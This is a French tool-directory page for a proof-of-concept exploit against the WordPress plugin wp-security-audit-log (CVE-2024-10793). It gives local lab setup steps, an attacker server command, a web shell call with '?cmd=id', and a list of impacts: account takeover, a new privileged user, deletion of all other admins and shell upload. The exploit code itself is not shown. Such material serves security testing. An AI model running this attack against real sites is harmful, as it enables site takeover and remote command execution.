Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-10793 — Exploit de preuve de concept pour CVE-2024-10793 ciblant le plugin WordPress wp-security-audit-log. Démontre la prise de contrôle de compte, la création d'utilisateurs privilégiés, le téléchargement de shell et la manipulation d'administrateur via des requêtes HTTP conçues. | Kitploit
Outils/GitHubGitHub/mahajian/cve-2024-10793
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebDéveloppement de Charges Utiles
GitHubmahajian/cve-2024-10793

CVE-2024-10793

Exploit de preuve de concept pour CVE-2024-10793 ciblant le plugin WordPress wp-security-audit-log. Démontre la prise de contrôle de compte, la création d'utilisateurs privilégiés, le téléchargement de shell et la manipulation d'administrateur via des requêtes HTTP conçues.

Voir le dépôt
211il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Preuve de concept CVE-2024-10793

Ajoutez ces lignes à votre fichier hosts :

root@kitploit:~
127.0.0.1  goodcms.lab
127.0.0.1  attacker.com

Lancez Wordpress avec docker :

root@kitploit:~
$ sudo systemctl start docker
$ sudo docker-compose up -d

Ouvrez http://goodcms.lab:2121 et suivez les étapes d'installation de WordPress. Installez wp-security-audit-log.5.2.1 ou des versions antérieures dans WordPress.

Lancez le serveur attaquant :

root@kitploit:~
$ php -S 0:9091 -t ./exploit

Livrez http://attacker.com à la victime & Bingo !

Impacts de l'exploit :

  • Ajouter un utilisateur privilégié.
  • Modifier le profil de l'administrateur actuel
  • Supprimer tous les administrateurs sauf le hacker :)
  • Téléchargement de shell
  • Déconnexion

alt text

Prise de contrôle du compte et création d'un utilisateur privilégié PoC : Identifiants de l'attaquant après l'exploit : { email: [email protected], username: amin, password: 123456 } (Vous pouvez les modifier dans le code xpl.js.)

Exécutez la commande shell : http://goodcms.lab:2121/wp-content/plugins/sogrid/shell.php?cmd=id

alt text

Télécharger l’outil